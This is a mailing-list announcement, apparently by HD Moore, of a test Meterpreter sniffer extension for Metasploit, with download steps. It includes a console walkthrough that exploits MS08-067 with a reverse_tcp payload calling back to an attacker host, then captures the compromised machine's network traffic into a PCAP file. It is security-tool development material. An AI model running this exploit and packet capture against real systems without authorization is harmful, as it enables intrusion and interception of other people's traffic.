Meterpreter Sniffer module

[hdm at metasploit.com (HD Moore)]

I committed a test version of the sniffer extension to the SVN trunk. The  
module in SVN is compiled with debug support, so you should see lots of  
verbose debug prints if you attach a debugger to the process where  
meterpreter is running. I could use some help testing this new extension;  
so far it looks like there are some cases where the "use sniffer" command  
fails (exploiting ms03-026 on win2003 sp0), but there may be others as  
well.


To obtain the latest version of Metasploit on UNIX platforms:
   $ svn co https://metasploit.com/svn/framework3/trunk/

To obtain the latest version of Metasploit on Windows:
   1. Download https://metasploit.com/framework-3.3-dev.exe
   2. Execute this and extract the framework to a directory
   3. Inside the extracted directory execute msfupdate.bat
   4. Inside the extracted directory execute msfconsole.bat

This module uses the MicroOLAP (commercial) Packet Sniffer SDK (we have a  
license), it can sniff packets from the target system without writing to  
the filesystem or installing any drivers. The module automatically  
excludes its own control traffic from the packet capture. As of this week,  
all Meterpeter communication is now protected by TLS/SSL, including the  
packet sniffer data.

To get started with the new module:

msf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpeter/reverse_tcp
msf exploit(ms08_067_netapi) > set LHOST 192.168.0.139
msf exploit(ms08_067_netapi) > set RHOST 192.168.0.120
msf exploit(ms08_067_netapi) > exploit

[*] Handler binding to LHOST 0.0.0.0
[*] Started reverse handler
[*] Triggering the vulnerability...
[*] Transmitting intermediate stager for over-sized stage...(216 bytes)
[*] Sending stage (205824 bytes)
[*] Meterpreter session 1 opened (192.168.0.139:4444 -> 192.168.0.120:1687)

meterpreter > use sniffer
Loading extension sniffer...success.

meterpreter > help
[snip]
Sniffer Commands
================

     Command             Description
     -------             -----------
     sniffer_dump        Retrieve captured packet data
     sniffer_interfaces  List all remote sniffable interfaces
     sniffer_start       Capture packets on a previously opened interface
     sniffer_stats       View statistics of an active capture
     sniffer_stop        Stop packet captures on the specified interface

meterpreter > sniffer_interfaces

1 - 'VMware Accelerated AMD PCNet Adapter' ( type:0 mtu:1514 usable:true  
dhcp:true wifi:false )

meterpreter > sniffer_start 1
[*] Capture started on interface 1 (200000 packet buffer)

meterpreter > sniffer_dump 1 /tmp/all.cap
[*] Dumping packets from interface 1...
[*] Wrote 6 packets to PCAP file /tmp/all.cap

meterpreter > sniffer_dump 1 /tmp/all.cap
[*] Dumping packets from interface 1...
[*] Wrote 31 packets to PCAP file /tmp/all.cap

The sniffer_dump command will append to an existing PCAP or create a new  
one.

-HD